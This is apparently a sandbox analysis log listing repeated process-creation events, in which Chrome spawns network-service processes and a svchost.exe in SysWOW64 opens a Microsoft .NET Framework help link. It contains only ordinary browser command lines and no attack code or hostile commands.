                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,12758286000912440692,11284502875771047049,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2000,i,15628247129644466505,3875143643089187018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1944,i,4936340759003262573,15814975481951039996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1984,i,3689067430776497247,15300495909368681371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1972,i,8812933395650124059,17698073702536386733,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1936,i,2605296248091638972,4924302696092150325,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1980,i,15377228353991002800,792711668187999877,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1996,i,306334268389520684,17870841813551360438,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1992,i,3378677205698214136,1924167881851413353,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=868 --field-trial-handle=2020,i,696290173973552029,16877605372930337061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1956,i,12129368793975855261,4084447202771776108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1976,i,5375429189451205296,3038177405675182667,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,8051270230576347227,15887782478097552568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,5804494753339918936,5217131698543492645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1136,i,1930181798274664567,3542273984303113262,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1668,i,10836949039064754798,10619019416050471488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1972,i,17733880235770984801,5447189613793920795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1984,i,120110399101443424,9941541229011483260,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=852 --field-trial-handle=1972,i,16836352753448976889,2601815521256357393,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1884,i,7301673669103937254,12836756404783810427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1940,i,12539128067224901217,8991374413711119156,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2000,i,15628247129644466505,3875143643089187018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1924,i,6482886242108065281,4105261451375631266,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2012,i,2947015941692405239,17280289242752989468,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1972,i,17200434405895777880,14925594255065276775,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1600 --field-trial-handle=1980,i,13945759412545287249,4073186008645904870,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1984,i,120110399101443424,9941541229011483260,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1988,i,15807299402186397352,10536807858062258795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,1442060403194708727,17590615368937411025,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1992,i,14774167980353239420,17590433410553186815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
